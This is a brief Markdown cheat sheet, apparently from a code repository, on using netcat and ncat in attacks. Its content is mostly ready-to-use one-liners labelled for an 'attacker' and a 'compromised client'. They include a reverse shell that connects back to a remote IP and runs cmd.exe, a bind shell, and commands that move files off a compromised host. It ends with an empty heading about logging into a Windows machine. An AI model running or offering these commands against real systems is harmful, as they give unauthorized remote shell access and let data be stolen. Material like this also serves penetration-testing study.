30 lines
639 B
Markdown
Executable File
30 lines
639 B
Markdown
Executable File
nc: TCP/IP Swiss Army Knife
|
|
ncat: concatenate and redirect sockets
|
|
|
|
-l: Listen and Bind
|
|
-p: Port
|
|
\--ssl: Use SSL
|
|
|
|
Example (Reverse Shell):
|
|
|
|
Attacker Client: `nc -lp 4444`
|
|
Compromised Client: `nc 1.0.0.0 4444 -e cmd.exe`
|
|
|
|
Example (Bind Shell):
|
|
|
|
Attacker Client: `nc 1.0.0.1 4444`
|
|
Compromised Client: `nc -lp 4444 -e cmd.exe -k`
|
|
|
|
Example (File Transfer Receive):
|
|
|
|
Attacker Client: `nc -lp 4444 > newFile`
|
|
Compromised Client: `nc 1.0.0.1 4444 < oldFile`
|
|
|
|
Example (File Transfer Transmit):
|
|
|
|
Attacker Client: `nc -lp 4444 < newFile`
|
|
Compromised Client: `nc 1.0.0.1 > oldFile`
|
|
|
|
Log into Windows Machine:
|
|

|